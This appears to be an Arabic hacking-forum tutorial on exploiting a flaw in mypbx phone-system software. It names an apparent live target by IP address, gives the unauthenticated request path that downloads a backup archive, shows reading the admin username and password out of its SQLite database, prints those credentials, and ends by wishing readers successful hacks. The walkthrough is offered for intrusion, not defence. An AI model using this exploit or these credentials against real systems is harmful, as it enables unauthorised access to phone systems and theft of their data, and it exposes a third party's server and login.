شرح استغلال برنامج my pbx

بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته

شرح ثغرة استغلال ثغرة mypbx

اول شي لازم يكون متوفر عندك اضافة فيرفوكس Tamper data + برنآمج sqlite Database

نبدأ اول شي تثبيت اضافة الفير فوكس
طبعا انا متبثها من قبل
رابط تثبيت الاضافة
نضغط استمرار وتنزيل
بعد التركيب نعيد تشعيل المتصفح
بعد اعادة التشغيل راح تلاقي الاداة بالشكل هذآ
حلو الان بعد التركيب
https://addons.mozilla.org/ar/firefox/addon/tamper-data
معي اي بي على شركة mypbx

http://86.34.142.238
تماام الان بعد ما فتحنا الاي بي
او شي لازم نشغل اداة التمبر داتا
بعد التشغيل نضيف الاستغلال
بعد الاي بي
بشكل هذا
ونضغط انتر
http://86.34.142.238/cgi/WebCGI?1284=alex_was_here.tar
/cgi/WebCGI?1284=alex_was_here.tar

حلو بعد ما تفتح معنا الصفحة بهالشكل نضغط على دونلود

راح تظهر معنا Download File
نضغط عليها
حلو تم تحميل ملف الباك اب
الي بهمنا ملف
قاعدة البيانات الخاص بالسيكربت
تماام الان نشغل البرنآمج
تآبعوو ,.

تمآم
الان استعرضنا الجداول

اليوزر admin
password :smart\
نجرب ندخل الصفحة
طبعا مثل ما شفتو راح تلاقي كل البيانات

اليكم شرح فيديو لطريقة استغلال الثغرة



اختراقات موفقة

رأح ارفق البرنامج مع الشرح

انتهى ولا تنسونا بصالح دعآئكم